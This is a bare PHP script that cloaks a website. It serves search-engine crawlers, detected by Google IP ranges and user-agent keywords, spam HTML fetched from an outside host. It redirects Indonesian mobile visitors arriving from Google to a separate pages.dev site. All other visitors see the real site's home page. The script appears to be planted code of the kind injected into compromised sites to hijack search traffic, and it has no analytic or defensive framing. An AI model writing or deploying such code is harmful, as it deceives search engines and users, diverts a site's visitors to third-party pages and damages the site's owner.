<?php
ob_start();
error_reporting(0);
header('Vary: Accept-Language, User-Agent');

function curl_get_contents($url) {
    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 5,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        ]);
        $res = curl_exec($ch);
        curl_close($ch);
        return $res;
    } elseif (ini_get('allow_url_fopen')) {
        return @file_get_contents($url);
    }
    return false;
}

function parseIpRanges($json_data) {
    $list = json_decode($json_data, true);
    $res = [];
    foreach ($list['prefixes'] as $p) {
        if (isset($p['ipv4Prefix'])) $res[] = $p['ipv4Prefix'];
    }
    return $res;
}

function ip_in_range($ip, $range) {
    if (strpos($range, '/') === false) return false;
    list($subnet, $mask) = explode('/', $range);
    $ip_dec = sprintf("%u", ip2long($ip));
    $subnet_dec = sprintf("%u", ip2long($subnet));
    $network_mask = ~((1 << (32 - (int)$mask)) - 1);
    return ($ip_dec & $network_mask) === ($subnet_dec & $network_mask);
}

function is_google_ua() {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? '');
    $keywords = ["googlebot", "google-site-verification", "google-inspectiontool", "googlebot-mobile", "googlebot-news", "bot", "ahrefs", "yandex", "bing"];
    foreach ($keywords as $k) {
        if (strpos($ua, $k) !== false) return true;
    }
    return false;
}

function is_mobile_device() {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? '');
    return preg_match('/(android|iphone|ipad|ipod|blackberry|windows phone|opera mini|mobile)/i', $ua);
}

function get_client_ip() {
    foreach ([
        'HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED',
        'HTTP_FORWARDED_FOR','HTTP_FORWARDED','HTTP_CF_CONNECTING_IP','REMOTE_ADDR'
    ] as $key) {
        if (!empty($_SERVER[$key])) return trim(explode(',', $_SERVER[$key])[0]);
    }
    return '127.0.0.1';
}

$link = "https://pub-ccbd31a86aa241789996ee81ec92c8ef.r2.dev/masuklahsini.html";
$redirect_url = "https://cariapadek123.pages.dev";
$home_url = "https://www.pdxascend.com/home.php";

$ip = get_client_ip();
$geo_json = curl_get_contents("http://ip-api.com/json/$ip");
$cc = $geo_json ? json_decode($geo_json, true)['countryCode'] ?? null : null;
$gjson = curl_get_contents("https://www.gstatic.com/ipranges/goog.json");
$granges = $gjson ? parseIpRanges($gjson) : [];

$isGoogleIP = false;
foreach ($granges as $r) {
    if (ip_in_range($ip, $r)) {
        $isGoogleIP = true;
        break;
    }
}

if ($isGoogleIP || is_google_ua()) {
    $content = curl_get_contents($link);
    if ($content) {
        header("Content-Type: text/html; charset=UTF-8");
        header("X-Robots-Tag: index, follow");
        header("Cache-Control: max-age=0, no-cache, no-store, must-revalidate");
        header("Pragma: no-cache");
        header("Expires: 0");
        ob_clean();
        echo $content;
        ob_end_flush();
        exit;
    }
}

$referer = $_SERVER['HTTP_REFERER'] ?? '';
if (
    is_mobile_device() &&
    $cc === 'ID' &&
    $_SERVER['REQUEST_URI'] === '/' &&
    strpos($referer, 'google') !== false
) {
    ob_clean();
    header("Location: $redirect_url", true, 302);
    ob_end_flush();
    exit;
}

$content = curl_get_contents($home_url);
if ($content) {
    ob_clean();
    echo $content;
}
ob_end_flush();
exit;
?>
